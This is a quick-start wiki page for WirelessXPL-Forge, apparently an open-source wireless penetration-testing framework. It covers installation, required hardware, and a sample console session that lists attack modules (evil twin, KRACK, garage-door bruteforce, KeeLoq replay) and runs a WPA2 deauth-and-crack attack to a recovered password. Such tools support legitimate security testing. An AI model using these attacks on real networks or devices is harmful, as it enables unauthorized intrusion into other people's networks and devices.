-
Notifications
You must be signed in to change notification settings - Fork 2
Quick Start
André Henrique edited this page Jun 8, 2026
·
1 revision
- Python 3.8 or higher (3.8-3.13 tested)
- Linux recommended (Kali, Parrot, Ubuntu); macOS supported; Windows via WSL2
- A wireless adapter with monitor mode support for live capture
pip install wirelessxplWith optional extras:
# Serial support for Bruce / ESP32 orchestration
pip install "wirelessxpl[serial]"
# ML signal classification (experimental)
pip install "wirelessxpl[ml-lite]"git clone https://github.com/mrhenrike/WirelessXPL-Forge.git
cd WirelessXPL-Forge
pip install -r requirements.txt
python wxf.pyAlternative launch methods:
python -m wirelessxpl
# or (after pip install -e .)
wxfsudo apt install aircrack-ng hcxtools hcxdumptool mdk4 hostapd dnsmasq tshark
pip install wirelessxpl| Scenario | Required Hardware | Notes |
|---|---|---|
| WiFi monitor/capture | Alfa AWUS036ACM or any monitor-mode adapter | Supported via aircrack-ng/scapy |
| Sub-GHz TX/RX | HackRF One | Replay, bruteforce, jamming |
| Sub-GHz RX only | RTL-SDR | Passive decoding (TPMS, signal analysis) |
| Sub-GHz budget TX/RX | CC1101 + ESP32 | 300-928 MHz static code attacks |
| Sub-GHz Flipper | Flipper Zero / Bruce firmware | .sub file replay |
| Drone testing | WiFi adapter + network access | DJI/Parrot via WiFi |
| MAVLink testing | UDP/TCP network access | ArduPilot/PX4 on UDP 14550 |
| BLE attacks | Bluetooth 4.0+ USB adapter | BlueZ on Linux |
| BLE advanced | nRF52840 dongle (Sniffle) | BLE sniffing |
| ESP32 flows | Bruce/Marauder ESP32 board | Serial USB connection |
| Maritime | RTL-SDR or HackRF | AIS/NMEA passive or active |
$ python wxf.py
__ __ _ _ __ ____ __
\ \ / / (_) | | /_ |/ __ \|\ \
\ \ /\ / / _ __| | ___ ___ | || | | |\ \
\ \/ \/ / | | / _` | / _ \/ __| | || | | | > >
\ /\ / | || (_| || __/\__ \ | || |__| |/ /
\/ \/ |_| \__,_| \___||___/ |_| \____//_/
WirelessXPL-Forge v1.8.0 | BSD-3-Clause
Author: Andre Henrique (@mrhenrike) | Uniao Geek
Modules: 329+ | Python 3.8-3.13
wxf >
wxf > help
Core Commands:
use <module> Load a module
show modules List all available modules
show options Show current module options
set <OPT> <value> Set option value
unset <OPT> Reset option to default
check Verify target is vulnerable
run Execute loaded module
back Unload current module
search <keyword> Search modules by keyword
info Show detailed module information
sessions List active sessions
exit Exit the framework
wxf > search wifi
[*] Searching for 'wifi' in module names and descriptions...
generic/wifi_lab/handshake_snooper PMKID-first + deauth handshake capture pipeline
generic/wifi_lab/wpa3_attack_suite Dragonblood SAE flood, CSA+harvest, Double SSID, downgrade
generic/wifi_lab/fragattacks FragAttacks (CVE-2020-26140+)
generic/wifi_lab/krack_attack KRACK WPA2 4-way replay
generic/wifi_lab/evil_twin_workflow Full evil-twin with verify-on-capture
generic/wifi_lab/wpa_brute WPA/WPA2 offline brute-force
generic/wids/wifi_ids Wireless Intrusion Detection System
generic/wardrive/wardrive_logger GPS-tagged WiFi discovery logger
...
wxf > search device=subghz
generic/subghz/static_code_replay EV1527/Princeton/CAME/NICE static code replay
generic/subghz/debruijn_bruteforce DeBruijn sequence bruteforce for garage doors
generic/subghz/keeloq_decoder KeeLoq rolling code frame decoder
generic/subghz/keeloq_replay KeeLoq rolling code replay
generic/subghz/tpms/tpms_decoder TPMS tire pressure sensor passive decoder
...
wxf > use generic/wifi_lab/wpa_brute
wxf (WPABrute) > show options
Options:
TARGET_BSSID (required) Target AP MAC address (AA:BB:CC:DD:EE:FF)
INTERFACE wlan0mon Monitor mode interface
WORDLIST (required) Path to wordlist file
SIMULATE false Dry-run without transmitting
wxf (WPABrute) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (WPABrute) > set INTERFACE wlan0mon
wxf (WPABrute) > set WORDLIST /usr/share/wordlists/rockyou.txt
wxf (WPABrute) > check
[*] Checking target AA:BB:CC:DD:EE:FF...
[+] Target is reachable on channel 6
[+] Security: WPA2-PSK
[+] PMKID available: yes
[*] Target is vulnerable to PMKID clientless attack
wxf (WPABrute) > run
[*] Starting WPA2 brute force against AA:BB:CC:DD:EE:FF
[*] Interface: wlan0mon | Wordlist: 14,344,391 words
[*] Attempting PMKID capture first (clientless)...
[+] PMKID captured: 4d4f4e4f3a3a3a3a...
[*] Falling back to 4-way handshake capture...
[*] Sending deauth frames to force reconnect...
[+] Handshake captured (4-way EAPOL)
[*] Testing passwords...
[*] Progress: 125,432/14,344,391 (0.87%) - 2,841/s
[+] PASSWORD FOUND: mypassword123
[+] Network: HomeWifi | Security: WPA2-PSK
[+] Evidence written to session log
wxf (WPABrute) > back
wxf > use generic/wids/wifi_ids
wxf (WirelessIDS) > set INTERFACE wlan0mon
wxf (WirelessIDS) > run
# Single module run with options
python wxf.py -m generic/wifi_lab/handshake_snooper \
INTERFACE=wlan0mon TARGET_BSSID=AA:BB:CC:DD:EE:FF
# Pipe commands from a file
python wxf.py < commands.txtAfter installation, check that all required system tools are available:
wxf > use generic/external/wireless_tool_prereq_audit
wxf (PrereqAudit) > run
[*] Checking system tool dependencies...
[+] aircrack-ng : found (/usr/bin/aircrack-ng) v1.7
[+] hcxdumptool : found (/usr/bin/hcxdumptool) v6.2.7
[+] hashcat : found (/usr/bin/hashcat) v6.2.6
[+] tshark : found (/usr/bin/tshark) v4.2.0
[!] hackrf_transfer : NOT FOUND - required for Sub-GHz TX
[!] mdk4 : NOT FOUND - optional (beacon flood, deauth storm)
[*] Core tools: OK | Optional tools: 2 missing
Next: CLI Reference | Wi-Fi Attacks | Sub-GHz Attacks
Author: Andre Henrique (@mrhenrike) | Uniao Geek
Primeiros Passos
Ataques Wireless
Drones e UAV
Protocolos Especializados
Ferramentas de Pentest
Hardware